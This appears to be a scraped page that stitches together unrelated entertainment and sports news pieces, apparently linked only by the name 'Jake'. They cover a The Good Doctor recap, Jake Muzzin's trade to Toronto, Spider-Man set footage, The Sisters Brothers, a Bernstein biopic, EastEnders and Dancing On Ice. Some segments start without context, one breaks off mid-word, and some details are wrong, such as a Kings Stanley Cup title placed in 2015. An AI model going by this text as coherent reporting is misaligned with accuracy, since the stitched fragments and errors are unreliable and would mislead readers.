This week on The Good Doctor, Shaun adjusts to Lea having a boyfriend, as Glassman struggles with the side effects of chemotherapy.
Shaun surprises Lea when he says how much he likes her new boyfriend, Jake. Lea asks if it’d be alright if she invited Jake over to watch a movie, which Shaun misinterprets as an open invite for the three of them to watch a movie together. He returns home from work and pops some corn, then knocks on Lea’s door, interrupting an intimate moment with Jake. Lea comes out and explains to Shaun that he needs to respect her privacy. The three of them can be friends, but she’ll also want some alone time with Jake. Shaun signals his understanding, then Lea agrees to movie night.
Afterwards, Shaun pays Glassman an unannounced visit and discovers that his mentor has been lying to him about his current condition. He finds Glassman in bed, hooked up to an IV; he has an unrelenting headache and nausea as a result of his aggressive PCV treatment. He explains to an upset Shaun that there’s nothing he can do that’d help, so Shaun returns to his apartment, where he confides in Lea. She tells him that he has to respect Glassy’s wishes, even if that means backing off. An appreciative Shaun then thanks Lea for her advice and says that his life is better when she’s in it. (D’aw!)
The following night, Shaun is able to hear Lea and Jake canoodling through the wall. He tries to ignore it, but he can’t. He opens his dresser drawer and pulls out a pair of noise-cancelling headphones, but it’s not enough. It’s more than just the sounds; Shaun is clearly not OK with the current dynamic, but he doesn’t know what to make of those feelings — at least not yet. And so, he picks himself up and heads back over to check on Glassman. He finds his mentor on the bathroom floor, unable to pick himself up after throwing up. Rather than say anything, Shaun gets down on the floor and sits by Glassman’s side to offer his shoulder. He can’t be Glassman’s doctor, but he can still be his friend.

Over the course of the episode, we learn that Sunny has been estranged from her daughter, Grace, for the last 15 years, having cast her aside after she decided to attend Juilliard and pursue a career in music. Since then, she has essentially replaced her daughter with a caretaker not much older than Grace, and that dynamic proves to Grace that her mother is capable of love. By the end of the hour, both Sunny’s heart and her relationship with Grace are on the road to recovery.
* Last but not least is Lim’s patient, Lana Moore, an autistic woman with arteriovenous malformation. Basically, Lana is at risk of multiple aneurysms and permanent brain damage. The high-risk procedure necessary to remove abnormal blood vessels, during which Lana must remain conscious, runs the risk of jeopardizing her ability to speak. Lim, Shaun and Morgan call on fellow autistic Javi, Lana’s roommate and sometimes friend with benefits, to quiz her during the surgery to make sure that she remains responsive throughout. The operation is ultimately a success, and Javi tells Lana that he’s in love with her.

Muzzin was acquired by the Maple Leafs on Monday night in a deal with the Los Angeles Kings. Toronto sent minor-league forward Carl Grundstrom, the rights to unsigned prospect Sean Durzi, and the Maple Leafs' 2019 first-round draft pick in return.
"Everyone was a Leafs fan and I was included," said Muzzin of his childhood in Woodstock, Ont., approximately 140 kilometres west of Toronto. "Playing hockey at a young age, we looked up to Doug Gilmour, Wendel Clark. We were all Felix Potvin in net. It's kind of funny how life works. Here we are, I'm coming home to the team I rooted for growing up."

Muzzin was an integral part of the Kings' Stanley Cup championship team in 2015, but L.A. has struggled this season, sitting last in the Western Conference standings. He now joins one of the top teams in the East as it gears up for a deep post-season run.
"That's why we play, to get to the playoffs and have a chance at winning the Stanley Cup," said Muzzin, who was in his second complete NHL season when the Kings won the league's title. "I was fortunate enough early in my career to have that opportunity and to be brought in on a good team and thrown into the fire a little bit.
"The last few years have been a battle and a struggle. I'm definitely excited to have another chance to get there and have another crack at it."
The 29-year-old Muzzin has four goals and 17 assists with a plus-10 defensive rating in 50 games with the Kings this season. He has 51 goals and 162 assists in 496 NHL games with 298 penalty minutes and a career plus-24 rating. Muzzin has also appeared in 50 career playoff games, scoring seven goals and adding 13 assists.

Maple Leafs general manager Kyle Dubas said negotiations began with Los Angeles GM Rob Blake in late December and that Muzzin checks a lot of boxes for Toronto, including having a year left on his contract before becoming an unrestricted free agent. He is owed $ 4 million US for the 2019-20 season.
"Our preference was to acquire players that have some term on their deals," said Dubas. "Contending is something we're aiming to do year in and year out as best as we possibly can for as long as we can.
"That's one of the things that was appealing about Jake. He's still in his prime and we're happy to know that he's going to be here for at least the next year and a half and two runs (at the Stanley Cup.)"
Muzzin adds depth to a Toronto defensive corps that has struggled at times this season, likely matching up with Morgan Rielly in the Maple Leafs' top pairing.
Igor Ozhiganov, Justin Holl and Martin Marincin could be the odd men out in Toronto's new defensive scheme, with Jake Gardiner and Nikita Zaitsev forming the Leafs' second pair and youthful Travis Dermott linking up with veteran Ron Hainsey in the third pairing.
"I do like our D. We've talked at different times about trying to bolster it," said Dubas. "Certain players have made outstanding strides this year, most notably Morgan Rielly has been outstanding from start to finish and thrust himself into the upper echelon of the league.
"We've got a very good group there so to add Jake and bolster that group is something that we're very happy about."

Dubas added that Gardiner, who has missed two games with back spasms, will likely be back on Friday when the Maple Leafs visit Detroit.
Muzzin represented Canada at the 2015 world championships and the 2016 World Cup of Hockey, winning gold at both. Muzzin was originally selected by the Pittsburgh Penguins in the fifth round (141st overall) of the 2007 NHL Draft. He signed an entry-level contract with Los Angeles on January 4, 2010.
Grundstrom has 13 goals and 16 assists in 42 games this season with the American Hockey League's Toronto Marlies. He had eight goals and six assists over 20 post-season games last year as part of the Marlies' AHL Calder Cup run after he had a goal and two assists in two regular-season games in 2017-18.
The 21-year-old Grundstrom was drafted in the second round of the 2016 draft by the Maple Leafs and has yet to play in the NHL.
"His compete, his effort, and his work, have been mainstays," said Blake on Grundstrom's appeal to the Kings. "His sense and his poise are above average and he's a strong skater."
The 20-year-old Durzi is a right-handed defenceman still in the Ontario Hockey League. Drafted in the second round of the 2018 NHL draft, he played his entire junior career with the Owen Sound Attack before being traded to the Guelph Storm partway through this season.

Over the last few months there have been a number of glimpses at Tom Holland and co-stars of Marvel‘s Spider-Man Far From Home, but we’re yet to see Gyllenhaal’s villain.
However the Avengers 4 sequel is currently shooting across Europe, with the latest scenes having been captured in Liberec, Czech Republic.
Posted on Twitter by Martin Knap, a set video is labelled: “Final scenes from Spider-Man: Far from Home in Liberec, now the end of filming.”
The footage see cars arriving in an inner city area filled with flaming debris. Gyllenhall’s Mysterio can be seen crouched on the ground.
Mysterio is facing off against Holland’s Peter Parker, who is seen wearing his new black Spider-Man costume.
Gyllenhaal’s villain is a master hypnotist, who is known for his large cape and fishbowl helmet.
In this footage the actor is certainly wearing a large cape and body armour, however the iconic headgear is nowhere to be seen.
It could be that it’s considered too cheesy for the MCU films, or maybe it’ll be worn in other scenes, or perhaps even the helmet will be added in digitally later like Thor’s eyepatch in Avengers Infinity War.
Could Tony Stark be sacrificing himself to bring back the boy he’s mentored since Captain America Civil War?
It’s certainly a common trope in epic sagas for the mentor to die, and would fit Tony’s story arc across the MCU so well.
Since 2008’s Iron Man, Tony’s moved from being a selfish womanising playboy, to a responsible, sacrificial father figure. What better way for him to bow out than by dying for those he loves?
Spider-Man Far From Home will be released in July 2019.
Kelsey Peters’ complicated love life isn’t the only thing in need of fixing on tonight’s Younger (TV Land, 10/9c).
A comedy-Western starring Joaquin Phoenix, John C. Reilly, Jake Gyllenhaal, and Riz Ahmed? Sign me the hell up. The Sisters Brothers is an upcoming film that features that fine cast under the direction of Jacques Audiard, and it looks incredible. Watch The Sisters Brothers trailer below.
The Sisters Brothers was already at the top of my must-see-list based on its impressive cast, and this trailer has just sealed the deal. John C. Reilly and Joaquin Phoenix star as Eli and Charlie Sisters, a pair of hitmen trying to track down a prospector, played by Jake Gyllenhaal. Riz Ahmed is also on hand, as a chemist. That is one hell of a cast, folks. Reilly is one of those actors who is amazing in everything, ditto Ahmed. Phoenix is probably the best actor working right now, and I love that Jake Gyllenhaal is leaning into goofy character-actor work more and more – the voice he’s using here is almost as memorable as the bizarre voice he used for Okja.
Jacques Audiard, who directed A Prophet, Rust and Bone and Dheepan, helms the film, and it looks like he and cinematographer Benoît Debie have conjured up a rich visual style for this film – that shot of the Reilly and Phoenix walking away from a burning building is stunning. The Sisters Brothers is adapted from the acclaimed novel by Patrick deWitt.
During Phoenix’s now-legendary interview with Will Ferrell, he spoke briefly about working on the film – specifically, he reminisced about riding horses:
PHOENIX: There was another one, the stunt horse, that I couldn’t even look at because she was just so ferocious, her muscles constantly flexing.
FERRELL: Twitching, ready to go, full gallop.
PHOENIX: And I couldn’t do that. I mean, I didn’t like riding horses. I actually regretted having to ride. I’m a little clueless, because I don’t think that I really thought about it that much until I was there and realized, “Oh, it’s a Western and we’re on horses a lot.” I hadn’t really considered that. I felt bad about riding them. I had the feeling that they were like, “I don’t really want you on my back.”
FERRELL: But they tell you that the horses love it.
PHOENIX: Yeah, but the horses tell you something different. I’m really bumming out this interview, man. [laughs] I’m sorry.
The Sisters Brothers will be out later this year.
Based on Patrick Dewitt’s acclaimed novel of the same name, follows two brothers – Eli and Charlie Sisters – who are hired to kill a prospector who has stolen from their boss. The story, a genre-hybrid with comedic elements, takes place in Oregon in 1851. The film is Jacques Audiard’s follow-up to his Palme D’Or Winning DHEEPAN, which premiered at the 2015 Cannes Film Festiva

Leonard Bernstein, famous for composing the music for West Side Story and for being the only lyric anyone can remember from R.E.M.’s “It’s the End of the World as We Know It (And I Feel Fine)”, is getting a biopic courtesy of Cary Fukunaga. Now, it looks like Fukunaga has found his leading man: Jake Gyllenhaal.
Jake Gyllenhaal is coming for that Oscar, so you better watch out. The actor has joined Cary Fukunaga’s new Leonard Bernstein biopic – a part that will likely offer Gyllenhaal the chance to rack up awards galore. Bernstein was an acclaimed composer, musician and conductor, responsible for the music of West Side Story, among other things. Bernstein was an outspoken figure, and often drew controversy for his political and personal opinions, including speaking out agains the Vietnam War. Fukunaga’s biopic will chronicle Bernstein’s rise to fame, and also his personal life – while the composer married Chilean-born American actress Felicia Cohn Montealegre, Bernstein was reportedly gay. Bernstein’s West Side Story collaborator Arthur Laurents once said that Bernstein was “a gay man who got married. He wasn’t conflicted about it at all. He was just gay.”
“Like many people, Leonard Bernstein found his way into my life and heart through West Side Story when I was a kid,” Gyllenhaal said (via The Playlist) “But as I got older and started to learn about the scope of his work, I began to understand the extent of his unparalleled contribution and the debt of gratitude modern American culture owes him. As a man, Bernstein was a fascinating figure—full of genius and contradiction—and it will be an incredible honor to tell his story with a talent and friend like Cary.”
Fukunaga added: “Bernstein’s artistic passions changed the way generations understood and appreciated music. It’s been wonderful collaborating with Michael and Jake on Bernstein’s story as we endeavor to capture both the iconic person and artist. Jake is the perfect partner to help bring this story to life and to play this legend.”
Gyllenhaal is a phenomenal actor who somehow always gets overlooked come award season (hey, Academy, where the hell was that Oscar nom for Nightcrawler?). Taking on this part seems to all but guarantee awards committees will pay attention – they love biopics, after all. Cary Fukunaga is an excellent filmmaker who doesn’t work nearly as much as he should, and I’m very interested to see what he does with this material.
Interestingly enough, this is one of two possible Leonard Bernstein biopics in the works. Steven Spielberg recently held a table read for a secret project that was reported to be “an untitled biopic on iconic composer Leonard Bernstein.” Spielberg is also making a remake of West Side Story, which, of course, features Bernstein’s music. Whether or not Spielberg will go ahead with his Leonard Bernstein biopic now remains to be seen.

Max Branning (played by Jake) was last seen on EastEnders weeks ago following the devastating storyline that saw his daughters Abi Branning (Lorna Fitzgerald) and Lauren Branning (Jacqueline Jossa) hospitalised after a horrific New Year’s Day fall.
Abi was left braindead and Max was forced to make the terrible decision as her father to switch off her life support, just as his ex-wife Tanya Branning (Jo Joyner) also returned to the BBC soap.
Traumatised by the loss of her sister, a recovering Lauren then left Albert Square in an attempt to give her son Louie a new life.
Unable to cope, Max followed suit but his return this week has showed the character in an entirely new place.
Revealing he’d married a mystery woman who turned out to be Tanya’s sister and his former sister-in-law Rainie (Tanya Franks), Max left Walford residents utterly baffled.
Now the actor has revealed there’s much more to come as the plot’s backstory is explored.
Posting on his Twitter account after the episode, Jake was eager to share his feelings with his 452,000 followers.
He said: “Thanks for all the love people, plenty more twists and turns to come #EastEnders.
“So happy to be working with Tanya Franks as I’ve always been a massive fan of her work,” he added.
While bosses are yet to reveal the truth about how the pairing came about, many fans are sure there is something more sinister at play.
When Abi died Max promised he would raise her newborn daughter as his own, affectionately also named Abi.
But given Max and Tanya’s fraught relationship, the latter is sure to be none-too-happy about the arrangement.
Could Rainie be hiding an ulterior motive in her match with Max, and is she simply trying to get close to her niece’s daughter?
And is Tanya behind everything ready to snatch the child away from a grieving Max?
“Max and Rainie?! She’s got to be using him to get baby Abi for Tanya?! #EastEnders @bbceastenders,” one viewer posted.
While another said: “I’m surprised they hadn’t paired Rainie and Max up before now and I love the fact Robbie [Jackson] was the only one who knew about the whole thing #EastEnders.”
“Omg! I didn’t expect Max to marry Rainie! All to get back at Tanya!.. Max, you are bad!! EastEnders never fails to shock! #eastenders #bbc1 #shocking,” a third speculated.
Actress Tanya also spoke out on the development, saying: “She’s going down a road that I would never have foreseen in the past, so as long as they keep challenging me with new aspects of Rainie then I’ll always enjoy it.
“I think Max and Rainie are working really well together,” she added to Radio Times.
EastEnders continues tomorrow at 7.30pm on BBC One.
The 25-year-old Coronation Street actress was competing head-to-head against former I’m A Celebrity… Get Me Out Of Here! star Jake Quickenden, 29, and rugby ace Max Evans, 34, in a bid to be crowned Dancing On Ice champion 2018.
However, speaking to Phillip Schofield after the winner was announced as Jake, Brooke teased her rival and took a swipe at him.
She laughed: “First the worst, second the best!
“Well done to Jake and Vanessa. Are you sure it’s not a fix?”
After enjoying the Dancing On Ice afterparty last night, Brooke took to the airwaves this morning to speak out about the “fix” and not winning.
Brooke said: “Do you know what? I’m okay. I thought I’d be absolutely gutted!
“But my mum and my family and just everyone backstage has just like picked me up every week and swept me up.
“It was such a good experience. Last night I just made sure I enjoyed my skates.”
The Dancing On Ice runner-up revealed that it has been tricky trying to juggle her Coronation Street schedule with her skating commitments.
She said: “You’ve constantly got to be on point with dates and times and where you’ve go to be.
“Sometimes I was taking my skates to Roy’s!”
Brooke also announced she would not be taking part in the tour after finishing in second place, saying: “I can’t do the tour because of work.”
Speaking to Key 103, Brooke added: “My body has changed so much from all the exercising so it’s been fun and fitting as well.”
Following her second performance of the night yesterday evening, host Phillip said: “I wish the judges were scoring tonight.
“You would have got your tens this week!”
Dancing On Ice is available to watch on the ITV hub now.
Dancing On Ice’s explosive finale last night marked the end of the first year of the show’s revival, as Jake toppled Coronation Street star Brooke Vincent at the last hurdle.
The show’s original contract ended in 2014, and was brought back with a brand new judging panel, including former coaches and Olympic athletes Jayne Torvill and Christopher Dean.
However eyes have already turned to the line-up for the 2019 series, and judge Jason has been questioned about whether he will return to the show for the next season.
“I don’t know. I don’t want to put it out there that I want to come back or not,” he told Metro.co.uk.
“I didn’t think this show would happen. I didn’t know whether it would come back.
“I got on with my life. I’m about to open in a starring role in a West End musical called Ruthless. My focus now is very much on the next gig.”
Although the choice may be out of Jason’s hands, as he currently has not been involved in any discussion with ITV bosses about the show.
He revealed: “I certainly haven’t had any dialogue with ITV or the producers about what’s happening next year.
“I think, to be fair, we’re all still very much in this series and we haven’t come to the end of it yet.”
After last night’s finale fans were involved in a “fix” row, as they spotted something unusual about runner-up Brooke’s performance.
One fan questioned: “How is it fair that Jake and Max both had more dancers both men and women and Brooke only had men!”
Brooke also commented on this at the end of the show after Jake had been announced as the winner, as she jokingly said: “Are you sure it’s not a fix?”
Jake spoke about winning the competition: “I can’t get my head around it, it might mean that I don’t have to do another reality show now.
“Brooke is incredible as well, she deserves to be proud of herself.”
Last night’s finale also saw Holly Willoughbymaking a raunchy remark about Brooke’s routine.
Dancing On Ice is available on ITV Hub.
